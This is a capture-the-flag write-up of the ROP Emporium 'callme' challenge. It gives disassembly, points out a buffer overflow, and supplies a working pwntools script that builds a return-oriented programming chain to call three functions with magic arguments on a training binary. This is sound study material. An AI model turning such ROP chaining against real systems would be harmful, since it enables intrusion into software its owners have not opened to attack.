callme

2023. 7. 7. 15:04·Wargame/ROP Emporium

1. intro

2. Code and analysis

2.1. Code

usefulFunction

   0x00000000004008f2 <+0>:     push   %rbp
   0x00000000004008f3 <+1>:     mov    %rsp,%rbp
   0x00000000004008f6 <+4>:     mov    $0x6,%edx
   0x00000000004008fb <+9>:     mov    $0x5,%esi
   0x0000000000400900 <+14>:    mov    $0x4,%edi
   0x0000000000400905 <+19>:    call   0x4006f0 <callme_three@plt>
   0x000000000040090a <+24>:    mov    $0x6,%edx
   0x000000000040090f <+29>:    mov    $0x5,%esi
   0x0000000000400914 <+34>:    mov    $0x4,%edi
   0x0000000000400919 <+39>:    call   0x400740 <callme_two@plt>
   0x000000000040091e <+44>:    mov    $0x6,%edx
   0x0000000000400923 <+49>:    mov    $0x5,%esi
   0x0000000000400928 <+54>:    mov    $0x4,%edi
   0x000000000040092d <+59>:    call   0x400720 <callme_one@plt>
   0x0000000000400932 <+64>:    mov    $0x1,%edi
   0x0000000000400937 <+69>:    call   0x400750 <exit@plt>

usefulGadget

   0x000000000040093c <+0>:     pop    %rdi
   0x000000000040093d <+1>:     pop    %rsi
   0x000000000040093e <+2>:     pop    %rdx
   0x000000000040093f <+3>:     ret

callme_one (callme_two and callme_three are almost identical)

   0x000000000000081a <+0>:     push   %rbp
   0x000000000000081b <+1>:     mov    %rsp,%rbp
   0x000000000000081e <+4>:     sub    $0x30,%rsp
   0x0000000000000822 <+8>:     mov    %rdi,-0x18(%rbp)
   0x0000000000000826 <+12>:    mov    %rsi,-0x20(%rbp)
   0x000000000000082a <+16>:    mov    %rdx,-0x28(%rbp)
   0x000000000000082e <+20>:    movabs $0xdeadbeefdeadbeef,%rax
   0x0000000000000838 <+30>:    cmp    %rax,-0x18(%rbp)
   0x000000000000083c <+34>:    jne    0x912 <callme_one+248>
   0x0000000000000842 <+40>:    movabs $0xcafebabecafebabe,%rax
   0x000000000000084c <+50>:    cmp    %rax,-0x20(%rbp)
   0x0000000000000850 <+54>:    jne    0x912 <callme_one+248>
   0x0000000000000856 <+60>:    movabs $0xd00df00dd00df00d,%rax
   0x0000000000000860 <+70>:    cmp    %rax,-0x28(%rbp)
   0x0000000000000864 <+74>:    jne    0x912 <callme_one+248>
   0x000000000000086a <+80>:    movq   $0x0,-0x8(%rbp)
   0x0000000000000872 <+88>:    lea    0x32f(%rip),%rsi        # 0xba8
   0x0000000000000879 <+95>:    lea    0x32a(%rip),%rdi        # 0xbaa
   0x0000000000000880 <+102>:   call   0x710 <fopen@plt>
   0x0000000000000885 <+107>:   mov    %rax,-0x8(%rbp)
   0x0000000000000889 <+111>:   cmpq   $0x0,-0x8(%rbp)
   0x000000000000088e <+116>:   jne    0x8a6 <callme_one+140>
   0x0000000000000890 <+118>:   lea    0x329(%rip),%rdi        # 0xbc0
   0x0000000000000897 <+125>:   call   0x6c0 <puts@plt>
   0x000000000000089c <+130>:   mov    $0x1,%edi
   0x00000000000008a1 <+135>:   call   0x720 <exit@plt>
   0x00000000000008a6 <+140>:   mov    $0x21,%edi
   0x00000000000008ab <+145>:   call   0x700 <malloc@plt>
   0x00000000000008b0 <+150>:   mov    %rax,0x2007a9(%rip)        # 0x201060 <g_buf>
   0x00000000000008b7 <+157>:   mov    0x2007a2(%rip),%rax        # 0x201060 <g_buf>
   0x00000000000008be <+164>:   test   %rax,%rax
   0x00000000000008c1 <+167>:   jne    0x8d9 <callme_one+191>
   0x00000000000008c3 <+169>:   lea    0x318(%rip),%rdi        # 0xbe2
   0x00000000000008ca <+176>:   call   0x6c0 <puts@plt>
   0x00000000000008cf <+181>:   mov    $0x1,%edi
   0x00000000000008d4 <+186>:   call   0x720 <exit@plt>
   0x00000000000008d9 <+191>:   mov    0x200780(%rip),%rax        # 0x201060 <g_buf>
   0x00000000000008e0 <+198>:   mov    -0x8(%rbp),%rdx
   0x00000000000008e4 <+202>:   mov    $0x21,%esi
   0x00000000000008e9 <+207>:   mov    %rax,%rdi
   0x00000000000008ec <+210>:   call   0x6f0 <fgets@plt>
   0x00000000000008f1 <+215>:   mov    %rax,0x200768(%rip)        # 0x201060 <g_buf>
   0x00000000000008f8 <+222>:   mov    -0x8(%rbp),%rax
   0x00000000000008fc <+226>:   mov    %rax,%rdi
   0x00000000000008ff <+229>:   call   0x6d0 <fclose@plt>
   0x0000000000000904 <+234>:   lea    0x2f1(%rip),%rdi        # 0xbfc
   0x000000000000090b <+241>:   call   0x6c0 <puts@plt>
   0x0000000000000910 <+246>:   jmp    0x928 <callme_one+270>
   0x0000000000000912 <+248>:   lea    0x301(%rip),%rdi        # 0xc1a
   0x0000000000000919 <+255>:   call   0x6c0 <puts@plt>
   0x000000000000091e <+260>:   mov    $0x1,%edi
   0x0000000000000923 <+265>:   call   0x720 <exit@plt>
   0x0000000000000928 <+270>:   nop
   0x0000000000000929 <+271>:   leave
   0x000000000000092a <+272>:   ret


2.2. Analysis

The main and pwnme functions are the same as in the previous challenges.

A usefulGadget and a usefulFunction are provided, and usefulFunction calls callme_one, callme_two and callme_three in turn.


3. Vulnerability and exploit preparation

3.1. Vulnerability

buffer overflow

3.2. Preparation

The files provided are listed below.

┌[wyv3rn🐲]-(~/rop)
└> ls
callme  encrypted_flag.dat  key1.dat  key2.dat  libcallme.so

Seen together with the code above, it clicks right away: calling callme_one / callme_two / callme_three should decrypt the flag.


Looking at callme_one alone, it compares the values in rdi, rsi and rdx against fixed constants (0xdeadbeefdeadbeef, 0xcafebabecafebabe and 0xd00df00dd00df00d in the disassembly) and performs its decryption step only if all three match.

The other two functions work the same way, so each of them just has to be called with those matching arguments.


4. exploit

from pwn import *

p = process('./callme')

# Entry points used for callme_one / two / three. These lie 6 bytes into the
# PLT stubs shown in the disassembly (0x400720, 0x400740, 0x4006f0).
one = 0x400726
two = 0x400746
three = 0x4006f6

gadget = 0x000000000040093c  # usefulGadget: pop rdi ; pop rsi ; pop rdx ; ret

pay = b'A'*8*5  # 40 bytes of padding up to the saved return address

# Each block returns into the gadget, which pops the three arguments into
# rdi / rsi / rdx, then its ret transfers control to the next callme_* entry.
pay += p64(gadget)
pay += p64(0xdeadbeefdeadbeef)  # rdi
pay += p64(0xcafebabecafebabe)  # rsi
pay += p64(0xd00df00dd00df00d)  # rdx
pay += p64(one)
pay += p64(gadget)
pay += p64(0xdeadbeefdeadbeef)
pay += p64(0xcafebabecafebabe)
pay += p64(0xd00df00dd00df00d)
pay += p64(two)
pay += p64(gadget)
pay += p64(0xdeadbeefdeadbeef)
pay += p64(0xcafebabecafebabe)
pay += p64(0xd00df00dd00df00d)
pay += p64(three)

p.sendlineafter(b'> ', pay)

p.interactive()